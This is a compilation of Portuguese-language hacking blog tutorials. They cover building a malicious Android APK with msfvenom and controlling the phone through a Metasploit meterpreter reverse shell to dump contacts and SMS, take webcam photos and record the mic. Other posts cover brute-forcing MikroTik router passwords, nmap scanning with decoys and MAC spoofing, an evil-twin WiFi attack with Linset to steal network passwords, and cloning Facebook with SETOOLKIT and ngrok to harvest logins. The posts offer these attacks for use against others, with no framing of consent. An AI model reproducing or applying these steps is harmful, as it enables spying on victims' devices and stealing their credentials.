Criar o payload usando o msfvenom

O msfvenom  é a combinação do Msfpayload e Msfencode, colocados juntos nessa ferramenta em um único framework. O msfvenom substituiu tanto o msfpayload quanto o msfenconde desde 08 de junho de 2015.  As vantagens são:
  • Um única ferramenta;
  • As opções de linha de comando foram padronizadas;
  • Aumento na velocidade de execução.
Possui um grande número de opções:
captura-de-tela-2016-11-19-as-2-31-48-pm

Ok Agora vamos criar o malware, o  apk – aplicação android , que irá ser disponibilizada para o dispositivo android.
Digite o seguinte comando:
captura-de-tela-2016-11-19-as-2-40-17-pm

Iremos disponibilizar essa aplicação maliciosa via um servidor web. Precisamos copiar o apk para o diretório do servidor web apache. Vamos também alterar o nome do arquivo index.html para index.txt para o apache listar os arquivos na página principal e finalmente reiniciar o apache.
# cp street fighter.apk  /var/www/html
# cd /var/www/html/
# mv index.html  index.txt
# service apache2 restart

Iniciar e acessar o metasploit

Iniciar o postgresql
# service postgresql start
Acessar o metasploit, digite msfconsole e aperte Enter.


captura-de-tela-2016-11-19-as-3-00-24-pm

Quando você digita use exploit/multi/handler e aperta Enter você diz para tratar exploits lançados de fora do framework.
Agora digite os seguintes comandos no msfconsole:
  • Digite set payload android/meterpreter/reverse_tcp e aperte Enter.
  • Digite set LHOST 192.168.173.238 e aperte Enter.
  • Digite show options e aperte Enter. Este comando  irá exibir qual a porta será aberta.
captura-de-tela-2016-11-19-as-3-12-33-pm

Digite exploit -j -z e aperte Enter. Irá rodar o exploit em background.
captura-de-tela-2016-11-19-as-3-18-59-pm

Usando o Android

Você pode fazer o download da ISO em http://www.android-x86.org/download. A instalação é bem tranquila. Após a instalação ter sido feita ligar a VM e acessá-la. Abaixo segue tela inicial do Android Versão 4.3.

captura-de-tela-2016-11-19-as-4-21-31-pm

Clique no Menu e acesse o Browser. Vamos baixar uma imagem qualquer.

captura-de-tela-2016-11-19-as-4-25-24-pm

O próximo passo é baixar o apk malicioso disponível na máquina do Kali.
na url do browser digite: http://192.168.173.238
Baixe o apk. Ele irá para Downloads. Clique no menu principal vá até Downloads e clique no apk. Ele irá informar que você deve permitir a instalação de programas de fontes desconhecidas. Aceite e tente instalar novamente. Clique em abrir a aplicação. No kali você verá a conexão reversa sendo executada.

captura-de-tela-2016-11-19-as-4-35-13-pm

Digite sessions -l para listar as sessões abertas. Ele exibiu uma sessão com ID igual a 1 aberta.
captura-de-tela-2016-11-19-as-4-37-52-pm

Acessar essa sessão, digitando sessions -i 1. O -i é de interact, ou seja, interagir.
Pronto! Você está acessando o controlando o seu Android. Agora vamos brincar.
Digite ipconfig e verá informações de endereçamento.
Inserindo o comando sysinfo, irá exibir informações da máquina alvo, como o nome, sistema operacional e etc.
captura-de-tela-2016-11-19-as-6-00-11-pm
Como no Linux, digitando pwd irá exibir o diretório atual que você no sistema.
O diretório principal do Android é o /sdcard. Para mudar basta usar o comando cd.
meterpreter> cd /sdcard
meterpreter> pwd
Ele exibe que o diretório corrente é o /storage/emulated/legacy porque está emulando um armazenamento interno de um dispositivo móvel mesmo.
Pode-se criar agora um diretório chamado base, depois dê um ls:
captura-de-tela-2016-11-19-as-7-10-23-pm

A idéia é fazer um upload de um arquivo do Kali para o diretório base. Para fazer isso precisamos mudar para o diretório /sdcard/base. Outro detalhe importante é que ele só permite fazer upload de arquivos que estejam no diretório root do Kali.
Vou copiar o apk que está dentro de /var/www/html para o /root.
captura-de-tela-2016-11-19-as-7-36-38-pm
Agora fazer o upload do arquivo.
captura-de-tela-2016-11-19-as-7-31-59-pm

Para ver todos os arquivos localizados  no diretório Download, é necessário alterar para o diretório com o comando cd /sdcard/Download. Em seguida digitar ls para ver os arquivos lá dentro.
captura-de-tela-2016-11-19-as-7-44-17-pm

Bem podemos ver que tem alguns arquivos dentro do diretório. Para baixar basta digitar o comando download e o nome do arquivo completo.

captura-de-tela-2016-11-19-as-7-47-52-pm

Agora vá no Kali no diretório home folder par ver a imagem baixada.

captura-de-tela-2016-11-19-as-7-50-23-pm


captura-de-tela-2016-11-19-as-7-52-58-pm

Digite o comando help e verá as muitas opções desse exploit. Explore os comandos abaixo:
meterpreter> search -f *.mp3
meterpreter> dump_contacts
meterpreter> dump_sms
meterpreter> webcam_list
meterpreter> webcam_snap
meterpreter> webcam_snap -l 1
meterpreter> record_mic 5
meterpreter> webcam_stream -I 2

nWatch – Ferramenta de Discovery e PortScanning

nWatch é uma ferramenta desenvolvida em Python que lhe permite realizar uma varredura completa na rede em busca de detalhes de Portas, Hostname, Status, Sistema Operacional , DHCP, MAC e etc.
Projeto: https://github.com/suraj-root/nWatch
01 Passo
Realize o download do nWatch e lista o conteúdo do diretório
root@kali:/# git clone https://github.com/suraj-root/nWatch
root@kali:/# cd nWatch
root@kali:/nWatch# ls -l

02 Passo
Certifique-se que os pacotes a seguir estejam instalados.
root@kali:/nWatch# pip install nmap scapy colorama python-nmap

03 Passo
Execute o nWatch
root@kali:/nWatch# pyhton nwatch.py

04 Passo
Selecione a opção 2 onde aparece a interface eth0

05 Passo
Aguarde a varredura em toda rede para visualizar os detalhes de cada host encontrado.

MKBRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

 O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Desenvolvedores:
Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire
Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa
Projeto: github.com/mkbrutusproject/mkbrutus
01 Passo
Verifique a versão atual do python em seguida realiza a instalação da versão 3
root@kali:~# python –version (Exibe a versão do Python)
root@kali:~# apt-get install python3 (Realiza a instalação do Python 3)
mkbrutus01
02 Passo
Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.
root@kali:~# python –version (Exibe a versão do Python)
mkbrutus02
03 Passo
Realize o download do projeto mkbrutus
root@kali:~# git clone https://github.com/mkbrutusproject/mkbrutus
mkbrutus03
04 Passo
Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.
root@kali:~# chmod -R 755 mkbrutus/
root@kali:~# cd mkbrutus/
root@kali:~/mkbrutus# ls -l
mkbrutus04
05 Passo
Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.
root@kali:~/mkbrutus# python3 mkbrutus.py -h
-h : Help (Ajuda)
mkbrutus05
06 Passo
São apresentadas todas as opções que a ferramenta mkbrutus disponibiliza.
mkbrutus06
07 Passo
Crie um arquivo de senhas ou realize o download de uma lista nos sites:
Lista: wiki.skullsecurity.org/Passwords
Lista: wordlist.sourceforge.net
root@kali:~/mkbrutus# vim senhas.txt
mkbrutus07
Conteúdo do arquivo senhas.txt
mkbrutus08
08 Passo
Realize o ataque no equipamento utilizando os seguintes parâmetros.
root@kali:~/mkbrutus# python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt
mkbrutus.py : Ferramenta de Brute Force
192.168.0.1 : IP do Roteador MikroTik
senhas.txt : Arquivo de Senhas(Wordlist)
O ataque é realizado com sucesso e o usuário e a senha são revelados:
Usuário: admin
Senha: P@ssw0rd
mkbrutus09


SHODAN – O sistema de pesquisa mais perigoso do mundo


Shodan
Shodan
SHODAN foi desenvolvido pelo programador John Matherly em 2009 com o objectivo de ser um serviço de pesquisa para que empresas como Cisco, Microsoft, entre outras, que tivessem a possibilidade de ter uma visão ampla sobre o uso dos seus equipamentos ou soluções.
A função específica do SHODAN é de realizar uma pesquisa por toda a internet mundial de computadores em busca de equipamentos como:
  • Webcams
  • Routers domésticos e empresarias,
  • iPads/iPhones
  • Smartphones com Android, WP, etc
  • Telefones VoIP
  • Computadores
  • Servidores
  • Sistemas de refrigeração
  • Sistemas de videoconferência
Para além da pesquisa, este motor de pesquisa procura pelas configurações por defeito, e passwords  de qualquer aparelho que tenha uma ligação com a Internet.

Entre a base do SHODAN estão equipamentos/serviços publicados com as portas: HTTP (80), FTP (21), SSH (22) Telnet (23), SNMP (161),SIP (5060) entre outros serviços. Isto tudo podendo se pesquisar utilizando os parâmetros/filtros que se queira.
Para quem pretender saber mais sobre vulnerabilidade e exploits, o Shodan disponibiliza também um serviço com essa informação – ver aqui.
O Shodan é uma arma poderosa para hackers e não só! Com base na informação fornecida, os utilizadores e administradores de sistemas podem melhorar um conjunto de aspectos de segurança.
Site Oficial:
www.shodanhq.com

Lista com sites para exploits

Conhecer uma falha primeiro coloca seja quem for numa posição privilegiada seja para atacar, seja para se poder defender.
Para tal deve-se ter uma boa fonte de informação que sejam verdadeiras e actuais.
Aqui fica uma longa lista com fontes para encontrar as ultimas vulnerabilidades (exploits) para que possam estar sempre actualizados.

Como descobrir a localização geografica de um IP pela consola

Se quiserem descobrir onde se localiza geograficamente um IP, existe  algumas ferramentas online com que é possível fazer um GeoIp Lookup.
Estas são grátis e as suas bases de dados são criadas a partir de vários serviços, mas para acede-las temos que aceder através do navegador, e o ideal mesmo é fazê-lo através da consola.
Neste artigo, vamos utilizar uma ferramenta que é o geoiplookup, que não vêem por defeito no nosso OS , vamos ter que instala-lo primeiro.

apt-get install geoip-bin

Vamos agora testa-lo:
geoiplookup 85.243.243.146

E o Resultado :
GeoIP Country Edition: PT, Portugal

No resultado é nos dadas as informações relativas ao ip procurado embora estes resultados não são muito informativos. Vamos por isso actualizar a nossa base de dados em relação ao IPs.

 wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz && wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz && wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum.dat.gz && gunzip GeoIP.dat.gz && gunzip GeoIPASNum.dat.gz && gunzip GeoLiteCity.dat.gz &&  cp GeoIP.dat GeoIPASNum.dat GeoLiteCity.dat /usr/share/GeoIP/
Geoiplookup
Geoiplookup
Irás vos aparecer que os ficheiros já existem e se os querem substituir pelos novos, basta carregar no Y e no enter a seguir para cada um deles.
Tentado novamente:
geoiplookup 85.243.243.146
E o resultado desta vez:
GeoIP Country Edition: PT, Portugal
GeoIP ASNum Edition: AS3243 PT Comunicacoes S.A.
O resultado vem com o ASNum que é o nome administrativo do IP.
Para se aceder à região , cidade ,codigo postal, altitude e longitude, se estas opções estiverem disponíveis  para o IP em questão:
geoiplookup -f /usr/share/GeoIP/GeoLiteCity.dat 85.243.243.146

O resultado:
GeoIP City Edition, Rev 1: PT, N/A, N/A, N/A, 39.500000, -8.000000, 0, 0

Então para se ver de onde um Ip está localizado a melhor formula, trocado o 85.243.243.146 pelo ip que estejam a procurar
geoiplookup 85.243.243.146 && geoiplookup -f /usr/share/GeoIP/GeoLiteCity.dat 85.243.243.146
 
 
 
 
BY:http://www.hacks.pt 

REDES



Uma rede de computadores é um conjunto de pcs ( dois ou mais) ligados directamente ou por um router, embora o maior exemplo que possa dado é a própria web em que tudo está interligado, normalmente refere-se a uma rede interna como em casa ou num escritório. O principal objectivo numa rede é a partilha de informação entre o conjunto ou do hardware (exemplo: impressora).



São varias as ferramentas que tem como função a analise e segurança das redes internas  e podem ser divididas  pelas seguintes sub-familias:



  • ARP Poisoning
  • Ataques DHCP
  • Mac Flooding
  • MAC Spoofing
  • Sniffing Tools

30 Exemplos de comandos N-MAP

O Nmap é um dos mais utilizados e completos programas para se fazer uma analise/rastreio  de uma servidor,rede ou sub net.
  Sendo um dos melhores isso implica que tenha várias facetas, utilidades e uma lista enorme de comandos e opções.  
  Uma breve introdução:
   Foi desenvolvido por Gordon Lyon, e com este programa tentou resolver algumas questões em relação aos testes que fazia: 
  1- Que computadores estão ligados na rede local?
  2- Que ips se encontram na rede?
  3-  Qual o sistema operativo do alvo?
4- Que portas tem o alvo abertas?
5- Descobrir se o sistema está infectado com vírus ou malware.
6- Pesquisar por computadores ou serviços não autorizados na rede.



Exemplo 1: Analisar um ip ou domínio
### Analise a um ip ###
 nmap 192.168.2.2
## Analise a um domínio
 nmap teste.com
## Analise com mais informação
nmap -v 192.168.2.2
Exemplo 1 Nmap Analise a um ip ou dominio

Exemplo 2: Analisar múltiplos ips ou uma rede subnet
# Varios Ips , separando-os com um espaço
 nmap 192.168.1.1 192.168.1.2 192.168.1.
## Dentro da rede
nmap 192.168.1.1,2,3
# De x a x numa selecção de ips
nmap 192.168.1.1-20
# Uma selecção com um wildcard
nmap 192.168.1.*
# Ou uma rede completa
nmap 192.168.1.0/24
Exemplo 3: Seleccionar os alvos a partir de um ficheiro
# Vamos criar um ficheiro em que são introduzidos os alvos:
cat > /root/Desktop/alvos.txt
# E dentro desse ficheiro os nossos alvos:
test.com
192.168.1.0/24
google.pt
facebook.com
8.8.8.8
# E o comando:
 nmap -iL /root/Desktop/alvos.txt

Exemplo 4: Excluir alvos de uma rede
#Quando se analisa uma rede grande através do exemplo 2, pode-se remover alguns host.
nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254
#Ou através de um ficheiro de exclusão como mostrado no exemplo anterior:
nmap -iL /tmp/scanlist.txt --excludefile /tmp/exclude.txt
Exemplo 5: Tentar detectar o Sistema Operativo e a sua versão:
# Com o comando -A
nmap -A 192.168.1.254
nmap -v -A 192.168.1.1
nmap -A -iL/root/Desktop/alvos.txt

Exemplo 6: Descobrir se o alvo é protegido por uma firewall:
#
Com o comando -sA
nmap -sA 192.168.1.254
nmap -sA facebook.com
Exemplo 7: Como Analisar quando o alvo é protegido por uma firewall.
#
com o
nmap -PN 192.168.1.1
nmap -PN server1.cyberciti.biz
Exemplo 8: Analisar um alvo com o IPv6:


nmap -6  IPv6-Address-Here nmap -6  google.pt nmap -6  2607:f0d0:1002:51::4 
nmap -v -A -6  2607:f0d0:1002:51::4
 
Exemplo 9: Analise e descoberta de Host ligados.
#Tecnica conhecida por ping ou descoberta de alvos:
nmap -sP 192.168.1.0/24

 Exemplo 10 : Analise rápida:
#Utilizando o argumento -F
nmap -F 192.168.1.1
Exemplo 11 : Adiciona a razão pelo qual o Nmap diz que tem a porta aberta:
nmap --reason 192.168.2.2
nmap --reason google.pt

Exemplo 12 : Apenas mostra portas abertas (ou possíveis abertas):

nmap --open 192.168.1.1
nmap --open google.pt

Exemplo 13 : Mostra todos os pacotes enviados e recebidos:

nmap --packet-trace 192.168.1.1
nmap --packet-trace facebook.com
Exemplo 14 : Mostra as saídas instaladas assim como os caminhos percorridos:

nmap --iflist
 nmap --iflist


 Exemplo 15: Analisar portas especificas:
Utilizando o comando nmap -p [port] hostName
## Analisar  porta  80
nmap -p 80 192.168.2.2

## Analisar porta 80 por  TCP
nmap -p T:80 192.168.2.2

##Analisar porta 53 por  UDP
nmap -p U:53 192.168.1.1

## Analizar duas portas##
nmap -p 80,443 192.168.1.1

## Analisar de x a x porta ##
nmap -p 80-200 192.168.1.1

## Combinação de todas  ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.2.2
nmap -p U:53,111,137,T:21-25,80,139,8080 facebook.com
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.2.2

## Analisar com um  * wildcard ##
nmap -p "*" 192.168.1.1

## Analisar as portas mais comuns   ## Esta aqui é fantástica
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1

 Exemplo 16: A maneira de Analise mais rápida de portas abertas:
nmap -T5 facebook.com

Exemplo 17: Detectar sistema operativo do alvo:

nmap -O 192.168.2.2

Exemplo 18: Analisar que programas e versão correm nas portas abertas:
nmap -sv 192.168.2.2
Dará algo assim:
Host is up (0.090s latency).
Not shown: 845 closed ports, 153 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD or KnFTPD
80/tcp open http Apache httpd 2.2.14 ((Unix))
Service Info: OS: Unix
Exemplo 19: Analisar um alvo utilizando TCP ACK (PA) e TCP Syn (PS) ping
# Se a firewall estiver bloqueando os pings normais (ICMP) utilizar o seguinte metodo de descoberta:
nmap -PS 192.168.2.2
nmap -PS 80,21,443 192.168.2.2
nmap -PS 192.168.2.2
nmap -PS 80,21,200-512 192.168..2.2
Exemplo 20:  Analisar um alvo utilizando o protocolo pig pelo IP
nmap -PO 192.168.2.2 
Exemplo 21: Analisar um alvo utilizando UDP ping
nmap -PU 192.168.2.2 
Exemplo 22:Descobrir as portas mais utilizadas usando a analise TCP SYN
### Analise camuflada##
nmap -sS 192.168.1.1
### A portas TCP mais utilizadas
nmap -sT 192.168.1.1
Exemplo 23 Analisar serviços UDO (Analise UDP):
nmap -sU 192.268.2.2
Exemplo 24: Analisar o Protocolo IP
#Esta analise permite detectar quais são os protocolos (TCP,ICMP,IGMP,etc) que o alvo suporta:
nmap -sO 192.168.2.2
nmap -sO facebook.com

Exemplo 25: procurar falhas na firewall
##  Uma analise nula para fazer a firewall gerar uma resposta##
nmap -sN 192.168.2.2
## Verificação de firewall
nmap -sF 192.168.2.2
## Faz os sets FIN, PSH, e URG, serem analisados.
nmap -sX 192.168.2.2
  
Exemplo 26: Analisar a firewall com pacotes fragementados
nmap -f 192.168.2.2
nmap -f fw2.nixcraft.net.in
nmap -f 15 google.pt
## Escolham o vosso offset com a opçãp –mtu ##

nmap --mtu 32 192.168.1.1
Exemplo 27: Iscos! A opção -D faz com que o alvo pense que está a ser analisado por mais maquinas.
#O IDS fará com que se reporte entre 5  a 10 portas a cada IP mas nunca sabe quais são os verdadeiros e os falsos.
nmap -n -Ddecoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip
nmap -n -D192.168.1.5,10.5.1.2,172.1.2.4,3.4.2.1 192.168.1.5
Exemplo 28 Analisar com o endereço MAC alterado :
nmap --spoof-mac MAC-ADDRESS-HERE 192.168.2.2
### Utilizar o endereço MAC aleatório ###

nmap -v -sT -PN --spoof-mac 0 192.168.1.1



Exemplo 29:Salvar as informações obtidas para um ficheiro:
nmap 192.168.2.2 > output.txt
nmap -oN /path/to/filename 192.168.2.2
nmap -oN output.txt 192.168.2.2

Exemplo 30:Por fim… Bem se acharam muita informação para decorar…
# A ferramenta zenmap é a versão gráfica do nmap
 apt-get install zenmap
 

zenmap-hd-648x700 (1)

INVADIR WIFI COM WIFISLAX(FUNCIONA DE VDD)

Fala galera e ae beleza hoje eu tô insano heheheh...! Vocês ja devem saber que eu não gosto de porcaria no blog. Bom galera hoje eu vou fazer um tutorial que um amigo  meu  me pediu pra fazer! Como conseguir uma senha de rede wifi; Usando o sistema operacional WIFISLAX!

O que vamos precisar dessa vez:

Wifislax

Linset

Adaptador de rede wifi ou notebook  

   Bom você pode usar um pendrive bootável! ae você não vai precisar de adaptador! é bem melhor, recomendo!

 vamos então para o que realmente nos "interessa" .



Ok! vamos lá, rápida explicação o que é o linset:
Linset é uma ferramenta cujo o objetivo é derruba as pessoas de um rede wifi e fazer uma rede falsa e fazendo as pessoas logarem nessa rede wifi fake achando que é a dela, logo a pessoa vai colocar a senha do wifi original dela no fake e com isso vamos pegar a do senha wifi. (desculpa galera, não sei explicar direito hehe)
O linset é meio que uma ferramenta de engenharia social. 

 Baixe a nova versão do sistema wifislax: CLIQUE AQUI 


Recomendo ao leitor colocar o wifislax em uma live usb.
Lembrando que nesse tutorial vamos precisar de um adaptador de rede wifi ou de um notebook.
Certo, depois de instalar o wifislax e iniciar a sessão com ele, vamos pra ação.
Vamos no menu iniciar do wifislax > wifislax > wpa > linset
caRoxxo.png
 
E iniciamos o programa.
 
HM7sC7F.png
 
Selecionamos a 1 opção (tecle 1 e de enter)
 
njJ81qj.png
 
Selecionamos novamente a opção 1 (tecle 1 e de enter)
 
VKtX48C.png 
 
Ira aparecer um terminal branco, nele vai ter todas as redes wifis próximas, ele vai ficar pegando varias wifis ele é um scan de redes.  Com bastante redes ja adicionadas pressione CTRL + C para cancelar o scan.[/align]
 
UtnmyGv.png
 
Aqui agora a parada é o seguinte, nos precisamos de pessoas na rede wifi que queremos atacar.
Pedro, como eu sei que tem pessoas na rede em que quero atacar?
Bom o linset te avisa com um asterisco em frente ao numero, quando se tem o asterisco quer dizer que tem gente na rede.
 
Selecione a rede que tem gente (olhe o numero, veja se tem asterisco em frente ao numero, digite o numero e aperte enter)
 
zeteU4h.png
 
Selecionamos novamente a opção 1 (tecle 1 e de enter)
 
IN30clW.png
 
Aperte enter
 
NmO7OUv.png
 
Selecionamos novamente a opção 1 (tecle 1 e de enter)
 
ybqBGRA.png
 
Selecionamos novamente a opção 1 (tecle 1 e de enter)
 
DeJAQNa.png
 
Ira aparecer alguns terminais abrindo, eu so peço a você para focar nessa ai de cima, é o unico que importa, ta vendo onde eu marquei com um quadrado? Então, você tem que espera o seu aparecer aquilo.
Quando aquilo aparecer você pode fechar. As vezes o linset buga e fica com uma tela preta, apenas de um enter.
 
Ira aparecer um terminal com 5 opções.
Selecione a primeira opção "Si" (tecle 1 e de enter)
 
Depois disso aparecera mais duas opções:
1) Interface web neutra
                                               2) Salir
 
Seleciona a primeira opção (tecle 1 e de enter)
 
Ira aparecer as opções de de linguagem.
O que é isso Pedro? A gente chegou até aqui e eu não estou entendendo mais nada.
Calma jovem, vamos lá.
 
1) Você selecionou a rede que quer invadir
                               2) Depois você viu se ela tem gente
  3) Você selecionou a opção de hospedagem
                               4) A gente realizou o ataque
                             5) O linset criou uma pagina falsa na web para que a pessoa possa colocar a senha dela lá, como se fosse em um wifi publico, sabe aquele wifi que pede pra você confirmar os termos de uso? Então ali seria para ele confirmar a senha dele.
 
Agora selecionamos a opção de língua portuguesa para o nosso  site na web.
 
Selecionamos a quinta opção (tecle 5 e de enter, caso a sua seja outro numero basta procurar a lingua portuguesa)
 
Após isso ele realizara o ataque (e sim, você se sentira o Elliot dessa vez com tantos terminais abertos hueuheuhe).
 
Beleza Pedro e agora?
Agora basta você esperar a pessoa conectar-se nesse wifi fake.
 
Vou deixar dois vídeos aqui dos cara fazendo esse ataque.
Peço desculpas por não ter continuado o tutorial com as fotos


Você quer se tornar um Hacker de Verdade!?(apostilas)

GALERA!!!! TRAGO PRA VOCÊS UM BONÛS DO CARALHO!!!! APOSTILAS HACKERS SUPER FODAS!

TEM VIDEO TEM APOSTILAS TEM VARIAS COISAS! É SÓ PEGAR E DETONAR E CLARO ESTUDAR TODAS ELAS!!

Lembrem-se pra ser um Hacker você não prescisa fazer nenhum curso nem faculdade! pra você ser realmente um HACKER! você tem que por a bunda na porra da cadeira e ESTUDAR!!            

           (OS HACKERS SÃO AUTODIDATAS)

kkk botei até o significado caso não saiba o que é!!

bom! Aproveitem galera e estudem de verdade, Apenas nesse grupo vocês tem realmente alguém que coloca as coisas pra vocês aprenderem.

GRUPO 1:




mais foda de todos: 

 

GRUPO 2:

http://computeirodadepressao.com/quase-2tb-terabytes-em-cursos-de-ti-para-download-o-computeiro-pirou/

 

GRUPO 3:

http://mundodoshacker.blogspot.com.br/2014/10/colecao-de-apostilas-hacker.html

GRUPO 4:

https://mega.nz/#F!iFIhTLQR!WY8H_vjm5DZomqNVToL9OA

 

 

Deixem o contato no comentário se quiser participar do gp!


  

Invadir Facebook com NGROK & SETOOLKIT


VIDEO DEMOSTRATIVO (FAÇA O QUE QUISER!)

"Assuma suas reponsabilidades kkkk"- Titio Lord

Bom galera, hoje eu to trazendo uma postagem bem diferente pra vocês, vou demonstrar como se cria uma página fake de qualquer site que você queira pegar credenciais, bom nesse exemplo eu uso o site "FACEBOOK" como exemplo mas você pode clonar outros sites!

Vou está usando o NGROK E O SETOOLKIT do kali, mas apenas o NGROK que você vai prescisar baixar vou deixar o link pra vocês dele esse aqui =>
bom avisando logo trate de aprender a mexer no Kali ou em qualquer outra distro, se não souber, blz! Fica ai só na porra da janela!

vou deixar logo aqui os comandos pq eu sei como é chato ficar pausando o video!

Depois que baixar o NGROK coloque ele na pasta bin do kali:

Primeiro ative o apache:

service apache2 start


depois  veja o status dele:

service apache2 status

bom os comandos para o setoolkit são:

setoolkit


1) Social-Engineering Attacks

2) Website Attack Vectors

3) Credential Harvester Attack Method

2) Site Cloner

digite o seu Host  do NGROK!

depois digite o endereço do site que vc quer clonar:

ex:www.blogger.com

se pedir uma mensagem tipo (y/n)

digite sim!! (y)


BOM FIQUEM COM O VIDEO AÍ: obs:qualquer dúvida é so mechamar no GP!




















Bom você quer particpar do nosso grupo então deixe o seu contato no comentário que imediatamente você será adicionado!⤋😗😗😗

Recomendado